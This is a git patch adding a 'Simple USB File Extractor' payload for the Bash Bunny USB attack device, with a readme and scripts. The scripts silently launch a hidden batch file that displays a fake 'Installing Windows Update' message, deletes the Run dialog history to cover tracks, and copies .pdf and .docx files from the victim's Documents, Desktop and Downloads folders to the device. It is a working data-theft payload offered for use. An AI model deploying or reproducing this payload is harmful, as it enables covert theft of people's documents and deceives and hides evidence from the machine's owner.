From 6fa5887aae88bbd898c97f097b6cf7122f99b528 Mon Sep 17 00:00:00 2001
From: danthegoodman1 <xxdanthegoodmanxx@gmail.com>
Date: Tue, 12 Dec 2017 03:11:25 -0500
Subject: [PATCH] Addition of Exfiltration payload (#300)

---
 .../exfiltration/simple-usb-extractor/i.vbs   |  1 +
 .../simple-usb-extractor/payload.txt          |  6 +++
 .../simple-usb-extractor/readme.md            | 32 ++++++++++++++++
 .../exfiltration/simple-usb-extractor/x.cmd   | 37 +++++++++++++++++++
 .../exfiltration/simple-usb-extractor/z.cmd   |  3 ++
 5 files changed, 79 insertions(+)
 create mode 100644 payloads/library/exfiltration/simple-usb-extractor/i.vbs
 create mode 100644 payloads/library/exfiltration/simple-usb-extractor/payload.txt
 create mode 100644 payloads/library/exfiltration/simple-usb-extractor/readme.md
 create mode 100644 payloads/library/exfiltration/simple-usb-extractor/x.cmd
 create mode 100644 payloads/library/exfiltration/simple-usb-extractor/z.cmd

diff --git a/payloads/library/exfiltration/simple-usb-extractor/i.vbs b/payloads/library/exfiltration/simple-usb-extractor/i.vbs
new file mode 100644
index 00000000..25dd4e32
--- /dev/null
+++ b/payloads/library/exfiltration/simple-usb-extractor/i.vbs
@@ -0,0 +1 @@
+CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
diff --git a/payloads/library/exfiltration/simple-usb-extractor/payload.txt b/payloads/library/exfiltration/simple-usb-extractor/payload.txt
new file mode 100644
index 00000000..d3d434be
--- /dev/null
+++ b/payloads/library/exfiltration/simple-usb-extractor/payload.txt
@@ -0,0 +1,6 @@
+# Executes z.cmd from the switch position's folder, thus launching x.cmd silently using i.vbs
+GET SWITCH_POSITION
+LED ATTACK
+ATTACKMODE HID STORAGE
+RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\z.cmd')"
+LED FINISH
diff --git a/payloads/library/exfiltration/simple-usb-extractor/readme.md b/payloads/library/exfiltration/simple-usb-extractor/readme.md
new file mode 100644
index 00000000..81d58dda
--- /dev/null
+++ b/payloads/library/exfiltration/simple-usb-extractor/readme.md
@@ -0,0 +1,32 @@
+# Simple USB File Extractor
+---
+- Author: DanTheGoodman
+- Creds: thehappydinoa, sebkinne
+(I snagged lots of lines from their code)
+
+### Description
+---
+A stupid easy to use file extractor leveraging the USB storage attack mode. Will stuff the found files in the `/loot/simple-usb-file-extractor` folder. Also deletes the run-line history because why not.
+
+
+
+### Dependencies
+---
+None :)
+
+
+
+### Configuration (optional)
+---
+By default the payload is set to pull all .pdf and .docx files from the Desktop, Downloads, and Documents folders. You can add new items/locations by making new xcopy lines in the x.cmd file.
+
+
+### Status:
+---
+|LED|Status|
+|---|---|
+|Yellow single blink|Running payload|
+|Solid Green|Files copied|
+
+---
+This is my first payload for the Bash Bunny, and I have finals right now, and I am doing this instead of studying so it's not fancy but I wanted to make something.
diff --git a/payloads/library/exfiltration/simple-usb-extractor/x.cmd b/payloads/library/exfiltration/simple-usb-extractor/x.cmd
new file mode 100644
index 00000000..757d8fd8
--- /dev/null
+++ b/payloads/library/exfiltration/simple-usb-extractor/x.cmd
@@ -0,0 +1,37 @@
+@echo off
+@echo Installing Windows Update
+
+REM Delete registry keys storing Run dialog history
+REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
+
+REM Set the location
+set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
+mkdir %dst% >>nul
+
+if Exist %USERPROFILE%\Documents (
+REM /C Continues copying even if errors occur.
+REM /Q Does not display file names while copying.
+REM /G Allows the copying of encrypted files to destination that does not support encryption.
+REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
+REM /E Copies directories and subdirectories, including empty ones.
+
+REM Add more of the line below specifying the location and file type
+REM The below example grabs all .pdf files from the user's documents folder
+REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul
+
+xcopy /C /Q /G /Y %USERPROFILE%\Documents\*.pdf %dst% >>nul
+xcopy /C /Q /G /Y %USERPROFILE%\Documents\*.docx %dst% >>nul
+)
+
+if Exist %USERPROFILE%\Desktop (
+xcopy /C /Q /G /Y %USERPROFILE%\Desktop\*.pdf %dst% >>nul
+xcopy /C /Q /G /Y %USERPROFILE%\Desktop\*.docx %dst% >>nul
+)
+
+if Exist %USERPROFILE%\Downloads (
+xcopy /C /Q /G /Y %USERPROFILE%\Downloads\*.pdf %dst% >>nul
+xcopy /C /Q /G /Y %USERPROFILE%\Downloads\*.docx %dst% >>nul
+)
+
+@cls
+@exit
diff --git a/payloads/library/exfiltration/simple-usb-extractor/z.cmd b/payloads/library/exfiltration/simple-usb-extractor/z.cmd
new file mode 100644
index 00000000..ed5eb189
--- /dev/null
+++ b/payloads/library/exfiltration/simple-usb-extractor/z.cmd
@@ -0,0 +1,3 @@
+@echo off
+cscript %~dp0\i.vbs %~dp0\x.cmd
+@exit